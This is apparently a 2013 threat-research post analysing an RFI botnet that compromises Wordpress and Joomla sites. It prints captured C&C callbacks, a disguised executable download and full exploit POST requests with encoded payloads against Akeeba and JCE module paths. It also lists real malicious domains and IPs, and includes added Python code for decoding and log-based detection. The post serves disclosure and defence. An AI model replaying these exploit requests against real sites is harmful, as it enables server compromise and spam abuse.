Overview of the RFI botnet malware arsenal
Exploits directed at Wordpress and/or Joomla content management systems (CMS) have been increasing at a dramatic rate over the past year. Internet blogs and forums are flooded with posts about hacked CMS installations. Popular jargon refers to the attackers as "hackers", but it is generally understood that these mass compromises are being performed by automated scanners and tools. However, we believe that there is not enough coverage of the actual malware involved.
One such infection scheme is essentially the following:
A downloader trojan (Mutopy - Win32) (20a6ebf61243b760dd65f897236b6ad3 Virustotal) instructs the infected host to download:
1) Remote File Injector "Symmi" (Win32) 7958f73daf4b84e3b00e008258ea2e7a Virustotal
2) SDbot (Win32) - aaee52bfb589f6534c4b51e3b144dc08 Virustotal
3) PHP scripts for injecting into compromised Wordpress sites. Among them is a PHP spambot (victimized site owners often get alerted about copious amounts of pharmaceutical and porn spam emanating from their sites). This is also the source of the varied links used in that spam: thousands of different links redirecting to the same sites (e.g. weight-loss, work-at-home scams, or porn sites).
The "hackers" attacking the Wordpress servers are armies of compromised Windows desktops continuously checking the C&C servers for new targets. This is why cleaned but not fully patched/secured sites get compromised over and over. It's trivial for a site owner to discover the malicious PHP script on their server; it's much harder to discover how the server was compromised in the first place.
This will be the first in a series of posts examining various CMS attacks and server compromises that DeepEnd Research continues to track. In this post, we take a quick look at one such attack infrastructure. Our goal in this first post is to simply raise awareness of the malware, domains and hosting providers used in this current attack. At the time of this writing, the infrastructure is actively scanning and exploiting vulnerable sites. With the prompt assistance of Afilias, the domains used in this infrastructure have since been taken down.
Executing this sample in a virtualized sandbox environment allowed for RAM to be easily captured and subsequently analyzed using Volatility v2.2. Examining the network connections active at the time of the RAM snapshot, we observe a number of outbound connections to remote sites on port 80.
The unpacked version of conhost.exe (7958F73DAF4B84E3B00E008258EA2E7A) contains a Base94 alphabet, which is used for encoding strings and communication requests in addition to the common Base64:
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
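To make the Base94 point concrete, here is an added Python example (not code from the sample or from DeepEnd Research) of a generic radix-94 codec over exactly that alphabet, plus a small classifier that separates strings that fit the Base64 alphabet from strings that need the wider one. The sample's actual framing (byte order, padding, any further transform) is not described in this post, so the codec is an assumption about how such an alphabet is typically used, not a decoder for the sample's traffic.

```python
# Added example: generic base-94 codec over the printable-ASCII alphabet '!'..'~'.
# The framing here (big-endian radix conversion, leading zero bytes mapped to '!')
# is an assumption for illustration, not the sample's documented scheme.

ALPHABET = "".join(chr(c) for c in range(0x21, 0x7F))   # '!' .. '~', 94 symbols
ALPHA_SET = set(ALPHABET)
INDEX = {ch: i for i, ch in enumerate(ALPHABET)}
B64_CHARS = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")


def b94encode(data: bytes) -> str:
    """Encode bytes as a base-94 string. Leading zero bytes are preserved by
    emitting one ALPHABET[0] ('!') per zero byte, the way base58 uses '1'."""
    n_leading = len(data) - len(data.lstrip(b"\x00"))
    num = int.from_bytes(data, "big")
    digits = []
    while num:
        num, rem = divmod(num, 94)
        digits.append(ALPHABET[rem])
    return ALPHABET[0] * n_leading + "".join(reversed(digits))


def b94decode(text: str) -> bytes:
    """Inverse of b94encode; rejects characters outside the 94-symbol alphabet."""
    n_leading = len(text) - len(text.lstrip(ALPHABET[0]))
    num = 0
    for ch in text:
        if ch not in INDEX:
            raise ValueError(f"character {ch!r} is not in the Base94 alphabet")
        num = num * 94 + INDEX[ch]
    body = num.to_bytes((num.bit_length() + 7) // 8, "big") if num else b""
    return b"\x00" * n_leading + body


def classify_encoding(text: str) -> str:
    """Rough triage for a captured string: 'base64' if every character fits the
    Base64 alphabet, 'base94' if it only fits the wider alphabet, else 'other'."""
    chars = set(text)
    if not text or not chars <= ALPHA_SET:
        return "other"          # empty, whitespace, or non-printable: not this scheme
    return "base64" if chars <= B64_CHARS else "base94"


if __name__ == "__main__":
    sample = b"\x00\x01hello"
    enc = b94encode(sample)
    print(enc, b94decode(enc) == sample, classify_encoding(enc))
```

The classifier is only a first-pass filter: a string that happens to use only Base64 characters may still be Base94, so it is a hint for which decoder to try first, not proof of the scheme.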
1. Examining the pcap shows initial communication with 'www.wholists.org' on 95.163.104.69 (initial callback):
POST /protocol.php?p=544355219&d=+ldPFacHQRWmAUMZtUAAHfFREUG1RAQdpWxDf6QFQhE= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 782
User-Agent: -
Host: www.wholists.org
Connection: Keep-Alive
Cache-Control: no-cache
d=9kMAR6MOJUHhXRtO9B5McvZUG1PnQQsNrWQASedWQA2tcBNO53wCRf0TCWjYfz98wHw0dMRyIGXPfhtD4VwBT%2FVHLnf6XRZP5EAuY%2BZBAEX9RyRF4UAbT%2F1vIk%2F%2FWhFJ9kAuZetDHk%2FhVgB8wUYcXbVWAlL0Ak938kEcSf1UXx7BVhVJ4EcAWb4NJVL6RxcSvg0xQf1HPVD2XVJb23g%2Bbc9gPWbHZDNy1m8%2FSfBBHVP8VQZ8xFocRPxEAXzQRgBS9l0GdvZBAUn8XS5y5l0PBvZDAEehDiVB4V0bTvQeTHL2VBtT50ELDa1kAEnnVkANrXATTud8AkX9Ewlo2HAnfMB8NHTEciBlz34bQ%2BFcAU%2F1Ry53%2Bl0WT%2BRALmPmQQBF%2FUckReFAG0%2F9byJP%2F1oRSfZALmXrQx5P4VYAfMFGHF21VgJS9ABPd%2FJBHEn9VF8ewVYVSeBHAFm%2BDSVS%2BkcXEr4NMUH9Rz1Q9l1SW9t4J3PPHTZl1XInbMdvIU%2F1RwVB4VYubfpQAE%2FgXBRUz2QbTvdcBVPPcAdS4VYcVMVWAFP6XBx8w1weSfBaF1PPdgpQ%2F1wAReFvIFX9TlRF40EVFK5kE1L9WhxHvg0gRfRaAVThSl8exEEbVPYBXx7QUhxU3EMXTrNIOmvGYC4O13Y0YcZ%2FJnzAXBRU5FIARc9%2BG0PhXAFP9Ucud%2FpdFk%2FkQC5j5kEARf1HJEXhQBtP%2FW8gVf1O
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:10 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
60
..F...@..>xH.G.....E.G.I._\S.\.E.R.P...R.....\.H..\J.TRC.].O.G\E.VR...@..A.N.@.A..]......GC..C.*
2. www.wholists.org directs the infected host to 'gettrial.store-apps.org', where it requests 'conh11.jpg' for download. We see that it's actually a Win32 executable rather than a JPG file. The file has an MD5 hash of 7958f73daf4b84e3b00e008258ea2e7a and is well detected on VirusTotal.
GET /d/conh11.jpg HTTP/1.1
User-Agent: -
Host: gettrial.store-apps.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:11 GMT
Content-Type: application/octet-stream
Content-Length: 98304
Last-Modified: Tue, 14 May 2013 20:21:33 GMT
Connection: keep-alive
Keep-Alive: timeout=20
ETag: "51929ccd-18000"
Accept-Ranges: bytes
3. Next, our bot sends a GET request for "/img/seek.cgi?lin=100&db=ndb" to "seek4.run-stat.org" on 46.165.230.185, followed by a GET to bt.ads-runner.org on 208.115.109.53 for ae1.php:
GET /ae1.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: bt.ads-runner.org
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:15 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 373
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 27 May 2013 03:27:15 GMT
Accept-Ranges: bytes
PldRR1A8aG1ma11xaWtsbGdwPi1XUUdQPAg+TENPRzwgSG1mayJRaWtsbGdwID4tTENPRzwIPlFX
QEg8SmciamcuIiJOY3ZrbCJhbWdmIm93ZGRma3RnZiIkImR3YWlnZiJmbWVle3F2e25nImBnZiJx
Z3o+LVFXQEg8Igg+UUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLXV1dSxlYHRjZXBrYW1uYyxh
bW8tYW1vcm1sZ2x2cS1hbW9dcm1ubi1jdUEzeixqdm9uIDxOY3ZrbCJhbWdmIm93ZGRma3RnZiIk
ImR3YWlnZiJmbWVle3F2e25nImBnZiJxZ3o+LWM8Pi1ma3Q8CD4tUUBNRls8CA==
There were several PHP scripts observed being downloaded from 46.165.230.185. These are part of the arsenal of scripts, one or more of which may be injected into a vulnerable server. We link here to the PHP scripts we saw in use by this malware. The presence of any of these scripts on a CMS webserver is a good indication of compromise.
4. The next conversation our bot initiated was of particular interest. Here the bot sent multiple requests for "ggu.php" from 'fw.point-up.org' on 85.143.166.221. The server would respond with a single URL representing a Wordpress or Joomla site.
GET /ggu.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: fw.point-up.org
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
41
http://redacted.com/English/data/cache/diggCache/f7/19/18/page.php
0
We scripted a fetch of this file every few seconds and have since collected thousands of URLs that will be targeted for exploits. After receiving the target URL from the server on fw.point-up.org, the bot will attempt exploits with various payloads. By dumping the VAD of the 'conhost.exe' process, I was able to find references to CMS module paths that have had reported vulnerabilities. For example:
List of URLs from fw.point-up.org
The server response varies depending on the success or failure of the attempt. Examination of the traffic indicates a much larger proportion of apparently successful exploits than failures. The following are examples of three different responses that were seen.
1. OKe807f1fcf82d132f9bb018ca6738a19f+0 -- "OK" followed by the MD5 hash of 1234567890 = success
POST /fincaxxxxxxoja/administrator/components/com_akeeba/assets/javascript.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: [redacted].com
Content-Length: 439
Connection: Keep-Alive
Cache-Control: no-cache
lQSWlN=UGN0azk5cGN0a3FwZ2dsa3RjcWNsQntvY2tuLGFtbw==&eveKxt=JbvnFDiuGIh&moYkYn=b3ZjNSxjbzIse2NqbW1mbHEsbGd2&dsmIC=PldRR1A8a3BvY110Y25nbHh3Z25jPi1XUUdQPAg%2BTENPRzwgS3BvYyJUY25nbHh3Z25jID4tTENP RzwIPlFXQEg8RHU4IiJEcGdxaiJhd29kY2FnZiJqZ3BnPi1RV0BIPCIIPlFATUZbPAg%2BZmt0PD5j ImpwZ2Q%2FIGp2dnI4LS1wd3hlY3BkbyxsZ3YtdXIvYW1sdmdsdi12amdvZ3EtdnVnbHZ7dmdsLWNO M0gsanZvbiA8RHBncWoiYXdvZGNhZ2YiamdwZz4tYzw%2BLWZrdDwIPi1RQE1GWzwI &jwIm=YVdRaWRBe0NbVQ==
HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
OKe807f1fcf82d132f9bb018ca6738a19f+0
2. Not Allowed = Host not vulnerable
POST /plugins/editors/jce/libraries/classes/json/defines.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.[redacted].org
Content-Length: 506
Connection: Keep-Alive
Cache-Control: no-cache
lFgaqq=UGN0azk5cGN0a3FqY0J7Y2ptbSxrdg==&eaMKYX=QMMIJINvf&mQaLuv=b3ovZ3csb2NrbixjbzIse2NqbW1mbHEsbGd2&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR
HTTP/1.1 406 Not Acceptable
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache
Content-Length: 226
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Not Acceptable!
An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.
POST /plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.[redacted].com
Content-Length: 506
Connection: Keep-Alive
Cache-Control: no-cache
lFgaqq=UGN7OTlwY3tgZ2xgbUJlb2NrbixhbW8=&eaMKYX=QMMIJINvf&mQaLuv=ZW9ja24vcW92ci9rbCxuLGVtbWVuZyxhbW8=&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR
HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:20 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-7+squeeze14 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2
X-Powered-By: PHP/5.3.3-7+squeeze14
Vary: Accept-Encoding
Content-Length: 354
Content-Type: text/html; charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
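As an added example for defenders (not code from this post or from DeepEnd Research), the following Python turns the request/response shapes shown above into detection logic: one function recognizes the bot's exploit attempts from the request alone, a second labels the server's answer using the three outcomes documented above, and a log scanner applies the request-side check to constructed Apache-style combined access log lines. The three module paths, the bare "Mozilla/5.0" User-Agent, the "OK"+MD5("1234567890") success marker, the 406/Mod_Security block and the "Not Allowed" outcome are taken from the captures above; the sample log lines, client IPs and verdict names are constructed for the example.

```python
import hashlib
import re

# Module paths the bot POSTed to in the captures above. The site-specific leading
# directory (e.g. "/fincaxxxxxxoja") varies per target, so we match on the suffix.
TARGET_PATH_SUFFIXES = (
    "/administrator/components/com_akeeba/assets/javascript.php",
    "/plugins/editors/jce/libraries/classes/json/defines.php",
    "/plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php",
)
BOT_USER_AGENT = "Mozilla/5.0"   # the bare UA string the bot sends, as captured

# Success marker from the capture: "OK" + MD5("1234567890") + "+<n>".
PROBE_MD5 = hashlib.md5(b"1234567890").hexdigest()
OK_RE = re.compile(r"^OK([0-9a-f]{32})\+(\d+)$")


def is_bot_request(method: str, path: str, user_agent: str) -> bool:
    """True for a request shaped like this bot's exploit attempts: a POST to one
    of the known module paths, or a POST carrying the bare 'Mozilla/5.0' UA."""
    if method.upper() != "POST":
        return False
    path_hit = any(path.endswith(s) for s in TARGET_PATH_SUFFIXES)
    ua_hit = user_agent.strip() == BOT_USER_AGENT
    return path_hit or ua_hit


def classify_response(status: int, body: str) -> str:
    """Label the server's answer to an attempt using the outcomes seen above."""
    m = OK_RE.match(body.strip())
    if status == 200 and m and m.group(1) == PROBE_MD5:
        return "exploit-success"      # the injected script echoed the probe hash
    if status == 406 and "Mod_Security" in body:
        return "blocked-waf"          # rejected by mod_security before PHP ran
    if "Not Allowed" in body:
        return "not-vulnerable"       # host refused, per item 2 above
    return "unknown"


# Apache/nginx combined log format; response bodies are not in access logs,
# so the scanner can only use request shape and status, not classify_response().
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def scan_access_log(lines):
    """Return the entries that look like this bot's exploit attempts."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                  # skip lines not in combined format
        if is_bot_request(m["method"], m["path"], m["ua"]):
            hits.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"],
                         "status": int(m["status"])})
    return hits


# Constructed sample log lines (not from the post's capture); RFC 5737 test IPs.
SAMPLE_LOG = [
    '198.51.100.7 - - [27/May/2013:03:27:21 +0000] "POST /administrator/components/com_akeeba/assets/javascript.php HTTP/1.1" 200 38 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [27/May/2013:03:27:21 +0000] "POST /plugins/editors/jce/libraries/classes/json/defines.php HTTP/1.1" 406 226 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [27/May/2013:03:28:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0"',
    '203.0.113.9 - - [27/May/2013:03:28:05 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://example.test/?p=1" "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

A 200 on one of these paths in the access log only tells you the script exists and answered; whether the attempt actually succeeded needs the response body (a proxy or IDS capture), which is what classify_response() is for. A bare "Mozilla/5.0" UA on a POST is a strong signal here but is worth tuning against your own traffic before alerting on it alone.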
Hosting Infrastructure
The following is a list of the domains and IP addresses that were seen as part of this botnet infrastructure.
Domain | IP Address | ASN | Network Name |
---|---|---|---|
wholists.org | 95.163.104.69 | AS12695 | Digital Networks CJSC |
gettrial.store-apps.org | 95.163.104.94 | AS12695 | Digital Networks CJSC |
t22.run-stat.org | 95.163.104.69 | AS12695 | Digital Networks CJSC |
seek4.run-stat.org | 46.165.230.185 | AS16265 | Leaseweb |
bt.ads-runner.org | 208.115.109.53 | AS23033 | Wowrack |
fw.point-up.org | 85.143.166.221 | AS56534 | PIRIX-CORPNET-2 |
Passive DNS
95.163.104.69 | 95.163.104.94 | 46.165.230.185 | 208.115.109.53 | 85.143.166.221 |
---|---|---|---|---|
www.wholists.org | ns1.wholists.org | ns1.upsave.info | ntp.run-stat.org | fw.point-up.org |
bns.wholists.org | ns1.store-apps.org | fw.stat-run.info | bt.ads-runner.org | ns2.memrem.ru |
gjd.wholists.org | ns1.games-olympic.org | fw.run-stat.org | sk4.ads-runner.org | ns2.nalkanet.ru |
lbh.wholists.org | ns1.googleminiapi.com | mail.stat-run.info | ntp.stat-run.info | ns2.nallanite.ru |
qdp.wholists.org | peace.vijproject.com | bt2.run-stat.org | vm.clodoserver.ru | |
www.techsign.org | sogood.vitaminavip.com | jc.upsave.info | | |
ml.inviteyou.info | img.stat-run.info | ju.upsave.info | | |
Passive DNS data courtesy of ISC SIE
Routing and Peers
The following are the BGP peering relationship graphs of the prefixes for the involved hosting providers.
95.163.104.69 & 95.163.104.94 - AS12695 - Digital Networks CJSC (DINET)
Peering for AS12695 - January, 2013
Peering for AS12695 - May, 2013
In January, we see that for the prefix, 95.163.64.0/18, AS3216 and AS8657 were the primary upstreams for DINET, while in May, they added AS31133.
AS3216 - SOVAM-AS OJSC Vimpelcom
AS8657 - CPRM PT Comunicacoes S A
AS31133 - MF-MGSM-AS OJSC MegaFon
CIDR Report for AS12695
208.115.109.53 - AS23033 - WowRack
Peering for AS23033 - January, 2013
Peering for AS23033 - May, 2013
For the prefix, 208.115.109.0/24, Wowrack's primary upstream is AS11404, AS-VOBIZ - vanoppen.biz LLC.
CIDR Report for AS23033
85.143.166.221 - AS56534 - PIRIX-CORPNET-2
Peering for AS56534 - January, 2013
Peering for AS56534 - May, 2013
In January, for the prefix, 85.143.160.0/21, AS9002 and AS3267 were Pirix's primary upstreams. In May, they briefly added a relationship with AS50384.
AS9002 - ReTN.net
AS3267 - RUNNET
AS50384 - W-IX_LTD
CIDR Report for AS56534
DeepEnd Research will continue to report our findings and analysis of the malware and hosting infrastructure pertaining to CMS exploits. We are also working with victim organizations regarding any successful compromises detected.
Please feel free to contact us directly if you have anything you'd like to share, or if you would like further information from us.
Good post. But may I ask what is the aim of providing BGP peering information? How does peering information relate to malicious traffic? I assume that even if there is an increase in malicious traffic to those AS numbers, there would be still much more non-malicious traffic affecting peering graphs.
It's often interesting to learn of the relationships among the ASNs. It's noteworthy if an upstream consistently allows the routing of malicious traffic, as well as sourcing some themselves. The graphs here just show the peering for the announced prefixes containing the IPs listed in the post.
To glean a larger picture of the relationships, you'd need to examine the peering across all announced routes. Often, you will see a malicious provider put the bulk of their malicious traffic across certain prefixes. Much of this depends on the provider's customers as well.
In short, I've found that there is a great deal to be learned from examining the peering relationships, how they are announced or withdrawn over certain prefixes, and how they change over time.
Also, take a look at the research that HostExploit does in the identification and reporting of malicious providers:
http://hostexploit.com/